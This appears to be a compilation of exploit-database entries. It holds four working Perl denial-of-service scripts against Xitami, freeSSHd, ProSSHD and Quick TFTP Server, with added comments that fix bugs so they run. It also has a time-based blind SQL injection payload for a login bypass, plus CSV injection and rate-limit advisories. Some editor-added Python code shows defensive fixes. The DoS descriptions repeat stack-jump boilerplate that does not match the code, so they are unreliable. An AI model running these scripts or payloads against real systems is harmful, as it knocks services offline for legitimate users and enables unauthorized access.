<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: Xitami 2.5 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 14 January 2024<br /># Vendor Homepage: https://imatix-legacy.github.io/xitami.com/<br /># Download to demo: https://drive.google.com/file/d/1Uw9fCQ9T3IBqn53pS2lETUCM6zzYDSb8/view?usp=sharing<br /># Notification vendor: Not reported<br /># Tested Version: Xitami 2.5<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://www.youtube.com/watch?v=tutFcL3Gh8I<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle requests with large amounts of data sent to the web server.<br />#The following request sends a large amount of data to the web server to process; the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> # $^O is "MSWin32" on Windows; the original compared against "windows", which never matches.<br /> $sis="$^O";<br /><br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /><br />print "\t ==> Connecting to webserver... \n\n";<br />sleep(1);<br /><br /> # String repetition in Perl is 'x'; "A"*939 is numeric multiplication and evaluates to 0.<br /> $exploit = "A" x 939;<br /><br />if ($socket = IO::Socket::INET->new<br /> (PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => "TCP"))<br /> <br /> { <br /> # The original referenced an undefined $target; the host from the command line is $ip.<br /> $header =<br /> "GET / HTTP/1.1\r\n".<br /> "Host: ".$ip." \r\n".<br /> "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";<br /><br /> print $socket $header."\r\n";<br /> sleep(1);<br /> close($socket);<br /> }<br /><br />else<br /> {<br /> print "[-] Connection to $ip failed!\n";<br /> } <br /> <br /><br /><br />print "\t ==> Done! Exploited!";<br /> sub intro {<br /> print q {<br /><br /><br /> _________<br /> | |<br /> | Exploit |==( ) //////<br /> |_________| ||| | o o| <br /> ||| ( c ) ____<br /> ||| \= / || \_<br /> |||||| || |<br /> |||||| ...||__/|-"<br /> |||||| __|________|__<br /> ||| |______________|<br /> ||| || || || ||<br /> ||| || || || ||<br /> ------------|||-------------||-||------||-||-------<br /> |__> || || || || <br /> <br /> [+] Xitami 2.5 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print "\n\tUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket;<br /><br /># Exploit Title: freeSSHd 1.0.9 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 13 January 2024<br /># Vendor Homepage: N/A<br /># Download to demo: <br /># Notification vendor: Not reported<br /># Tested Version: freeSSHd 1.0.9 - Denial of Service (DoS)<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: <br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The SSH server does not correctly handle the amount of data or bytes sent.<br />#When authenticating to the SSH server with a large number of characters for the server to process, the server will crash as soon as the data is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> # $^O is "MSWin32" on Windows; the original compared against "windows", which never matches.<br /> $sis="$^O";<br /><br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /># Unused filler buffer, kept from the original script.<br />my $bufff =<br /> "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"x18;<br /><br /><br /> # SSH identification string ("SSH-1.99-OpenSSH_3.4"), raw packet bytes, then a long run of "A"s.<br /> my $payload =<br /> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" .<br /> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" .<br /> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".("A" x 1067);<br /><br /> $payload .= $payload;<br /> $payload .= "C" x 19021 . "\r\n";<br /><br />my $i=0;<br />while ($i<=18) {<br /> my $sock = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp'<br /> ) or die "Cannot connect!\n";<br /><br /> # An empty banner line means the server is no longer answering.<br /> if (<$sock> eq '') {<br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> exit;<br /> }<br /><br /> $sock->send($payload) or die "Exploited successful!!!";<br /><br />$i++;<br />}<br /><br /><br /><br /> <br /> sub intro {<br /> print q {<br /><br /><br /> _/| <br /> // o\ <br /> || ._) <br /> //__\ <br /> )___( <br /><br /> [+] freeSSHd 1.0.9 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use Net::SSH2;<br /><br /># Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 13 January 2024<br /># Vendor Homepage: https://prosshd.com/<br /># Notification vendor: Not reported<br /># Tested Version: ProSSHD 1.2 20090726<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle requests with large amounts of data sent to the SSH service.<br />#The following request sends a large amount of data to the SSH service to process; the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> # $^O is "MSWin32" on Windows; the original compared against "windows", which never matches.<br /> $sis="$^O";<br /><br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /><br />print "\t ==> Connecting to SSH server... \n\n";<br />sleep(1);<br /><br />my $i=0;<br /> print "\t ==> Exploiting... \n\n";<br /><br /># The oversized value is passed as the remote path of an SCP download.<br />my $payload = "\x41" x 500;<br /><br />$connection2 = Net::SSH2->new();<br /># The original called connect() with an undefined $host; the target from the command line is $ip.<br />$connection2->connect($ip, $port) || die "\nError: Connection Refused!\n";<br />$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";<br />$scpget = $connection2->scp_get($payload);<br />$connection2->disconnect();<br /><br />print "\t ==> Done! Exploited!";<br /> sub intro {<br /> print q {<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--; <br /> ' \ | ^<br /> ^ ^<br /><br /> [+] ProSSHD 1.2 20090726 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port, $username, $password) = @ARGV;<br /><br /> # All four arguments are required; the original only checked the first two.<br /> unless (defined($ip) && defined($port) && defined($username) && defined($password)) {<br /><br /> print "\n\tUsage: $0 <ip> <port> <username> <password> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This product version is deprecated<br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /># Socket supplies PF_INET, SOCK_DGRAM, sockaddr_in and inet_aton used below (missing in the original).<br />use Socket;<br /><br /># Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 12 January 2024<br /># Vendor Homepage: https://www.tallsoft.com/<br /># Download to demo: https://drive.google.com/file/d/1Q4tIYjtv9Aqe5VE1fwnT18d3Cc-xkYEX/view?usp=sharing<br /># Notification vendor: Not reported<br /># Tested Version: Quick TFTP Server Pro 2.1<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://www.youtube.com/watch?v=yz7_ImFYueA<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle requests with large amounts of data sent to the TFTP service.<br />#The following request sends a large amount of data to the TFTP service to process; the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> # $^O is "MSWin32" on Windows; the original compared against "windows", which never matches.<br /> $sis="$^O";<br /><br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /><br />print "\t ==> Connecting to TFTP server... \n\n";<br />sleep(1);<br /><br />my $filename = "exploit";<br /><br />$shell = "A"x317;<br /><br />my $mode = "A" x 1360;<br /><br /># TFTP write request (opcode 2): filename, NUL, then an oversized mode string.<br />my $muha = "\x00\x02" .$filename . "\x00" .$mode;<br /><br />socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or die "socket() failed: $!";<br />send(SOCKET, $muha, 0, sockaddr_in($port, inet_aton($ip))) or die "send() failed: $!"; <br /><br />print "\t ==> Done! Exploited!";<br /> sub intro {<br /> print q {<br /><br /><br /> _________<br /> | |<br /> | Exploit |==( ) //////<br /> |_________| ||| | o o| <br /> ||| ( c ) ____<br /> ||| \= / || \_<br /> |||||| || |<br /> |||||| ...||__/|-"<br /> |||||| __|________|__<br /> ||| |______________|<br /> ||| || || || ||<br /> ||| || || || ||<br /> ------------|||-------------||-||------||-||-------<br /> |__> || || || || <br /> <br /> [+] Quick TFTP Server Pro 2.1 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print "\n\tUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This product version is deprecated<br /><br /></code></pre>
<pre><code>## Title: Copyright © Loan Management System 2024-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 01/12/2024<br />## Vendor: https://twitter.com/razormist<br />## Software: https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `password` parameter is vulnerable to SQL injection attacks. The<br />payload ' was submitted in the password parameter, and a database<br />error message was returned. An attacker can also bypass the login<br />form and log in to the system as an administrator using this SQLi<br />authentication-bypass vulnerability.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: password (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=aeoZNyVE&password=r8D!y8e!I8' AND (SELECT 8282<br />FROM (SELECT(SLEEP(7)))jrPA)# PgMx&login=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2024/Loan-Management-System-2024-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/01/copyright-loan-management-system-2024.html)<br /><br />## Time spent:<br />00:35:00<br /></code></pre>
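A defender-side illustration added by the editor, not part of the advisory above or the vendor's code: the login check assembled by string concatenation, the advisory's single-quote probe (`r8D!y8e!I8'`) producing a database error against it, and the same check with bound parameters, which treats that input as an ordinary wrong password. It uses Python with SQLite in place of the application's PHP/MySQL stack, so the MySQL-only `SLEEP()` part of the payload is not reproduced; the table, account and `probe` helper are constructed for the demo.

```python
import sqlite3

def demo_db():
    """In-memory users table with one constructed account (plaintext password
    only to keep the demo short; a real system stores a password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) "
                 "VALUES ('admin', 'correct horse')")
    return conn

def login_vulnerable(conn, username, password):
    """Query assembled by string concatenation: a quote in `password`
    becomes part of the SQL, which is what the advisory's probe detected."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_fixed(conn, username, password):
    """Same check with bound parameters: the driver passes the values apart
    from the SQL text, so quotes or SQL keywords in them change nothing."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

def probe(login, conn, username, password):
    """Classify a login attempt the way the advisory does: 'error' when the
    database rejects the query, otherwise 'ok' or 'denied'."""
    try:
        return "ok" if login(conn, username, password) else "denied"
    except sqlite3.OperationalError:
        return "error"
```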
<pre><code># Exploit Title: PHPJabbers Shared Asset Booking System v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/shared-asset-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51324<br /><br />Description:<br />PHPJabbers Shared Asset Booking System v1.0 is vulnerable to CSV<br />injection, which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list, which is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the Options menu, click Language, then click the Labels section.<br />3. Enter a CSV injection payload in any field and go to Import/Export.<br />4. Click Export and open the exported file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51324)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Shared Asset Booking System v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/shared-asset-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51323<br /><br />Description:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Shared Asset Booking System v1.0 allows attackers to send an excessive<br />number of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large number of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL:<br />https://demo.phpjabbers.com/1704802212_666/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Submit the e-mail address of an account that is already registered on this site.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder and start the attack.<br />5. Check your e-mail.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51323)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Night Club Booking Software v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51321<br /><br />Description:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Night Club Booking Software v1.0 allows attackers to send an excessive<br />number of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large number of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL:<br />https://demo.phpjabbers.com/1704802212_666/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Submit the e-mail address of an account that is already registered on this site.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder and start the attack.<br />5. Check your e-mail.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51321)<br /></code></pre>
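A mitigation for the two "No Rate Limit" findings above (this Night Club Booking Software entry and the Shared Asset Booking System one), added here as an editor's example and not taken from the vendor: a sliding-window limiter that caps reset requests per target address and per client, behind an endpoint that replies identically whether or not a mail was sent. The limits, the window and the `send_reset_mail` callback are assumptions for the demo.

```python
import time
from collections import deque

class ResetRequestLimiter:
    """Sliding-window throttle for a 'Forgot Email' / password-reset endpoint.

    Requests are counted per target account (so one victim cannot be flooded
    with reset mails) and per client address (so one client cannot spray
    requests across many accounts).
    """

    def __init__(self, per_account=3, per_client=10, window_seconds=3600,
                 clock=time.monotonic):
        self.per_account = per_account
        self.per_client = per_client
        self.window = window_seconds
        self.clock = clock           # injectable for deterministic tests
        self._account_hits = {}      # normalized e-mail -> deque of timestamps
        self._client_hits = {}       # client address -> deque of timestamps

    def _prune(self, hits, now):
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] >= self.window:
            hits.popleft()

    def allow(self, email, client_ip):
        """Record the request and return True if both limits permit it."""
        now = self.clock()
        acct = self._account_hits.setdefault(email.strip().lower(), deque())
        cli = self._client_hits.setdefault(client_ip, deque())
        self._prune(acct, now)
        self._prune(cli, now)
        if len(acct) >= self.per_account or len(cli) >= self.per_client:
            return False
        acct.append(now)
        cli.append(now)
        return True

def handle_forgot_email(limiter, email, client_ip, send_reset_mail):
    """Endpoint logic: the mailer runs only when the limiter permits, and the
    reply is identical either way, so it reveals neither the limit state nor
    whether the address is registered."""
    if limiter.allow(email, client_ip):
        send_reset_mail(email)
    return "If that address is registered, a reset message has been sent."
```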
<pre><code># Exploit Title: PHPJabbers Night Club Booking Software v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51320<br /><br />Description:<br />PHPJabbers Night Club Booking Software v1.0 is vulnerable to CSV<br />injection, which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list, which is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the Options menu, click Language, then click the Labels section.<br />3. Enter a CSV injection payload in any field and go to Import/Export.<br />4. Click Export and open the exported file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51320)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Bus Reservation System v1.1 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/bus-reservation-system/#sectionDemo<br /># Version: v1.1<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51319<br /><br />Description:<br />PHPJabbers Bus Reservation System v1.1 is vulnerable to CSV injection,<br />which allows an attacker to execute remote code. The vulnerability<br />exists due to insufficient input validation on the Unique ID field in<br />the Reservations list, which is used to construct a CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the Options menu, click Language, then click the Labels section.<br />3. Enter a CSV injection payload in any field and go to Import/Export.<br />4. Click Export and open the exported file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51319)<br /></code></pre>
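A mitigation for the three CSV Injection findings above (Shared Asset Booking System, Night Club Booking Software and this Bus Reservation System entry), added here as an editor's example and not taken from the vendor: an export routine that neutralizes formula-shaped cells before they reach the CSV, plus an audit function that flags such cells in an existing export. The column names and sample rows are constructed for the demo; the formula-shaped value is a harmless `=1+1`.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula
# when the exported CSV is opened. The advisories above export user-supplied
# fields (Unique ID, labels) into such a file without filtering them.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def looks_like_formula(text):
    """True if a spreadsheet would try to evaluate this cell.
    Only spaces are stripped first, so a leading tab is still caught."""
    return text.lstrip(" ").startswith(FORMULA_TRIGGERS)

def neutralize_cell(value):
    """Return the cell as text a spreadsheet will display rather than run.
    A leading apostrophe forces text mode; the csv writer quotes delimiters.
    Negative numbers such as "-5" are prefixed too, which is harmless."""
    if value is None:
        return ""
    text = str(value)
    return "'" + text if looks_like_formula(text) else text

def export_reservations(rows, fieldnames):
    """Write reservation rows to CSV text with every cell neutralized."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()

def audit_export(csv_text):
    """Scan an existing export and list (row, column, value) for every cell
    that would be evaluated as a formula; row 1 is the header."""
    findings = []
    reader = csv.DictReader(io.StringIO(csv_text))
    for num, row in enumerate(reader, start=2):
        for col, val in row.items():
            if val and looks_like_formula(val):
                findings.append((num, col, val))
    return findings

# Constructed sample rows: one benign Unique ID and one formula-shaped one.
SAMPLE_ROWS = [
    {"unique_id": "RES-1001", "name": "Alice", "seats": "2"},
    {"unique_id": "=1+1", "name": "Bob", "seats": "1"},
]
```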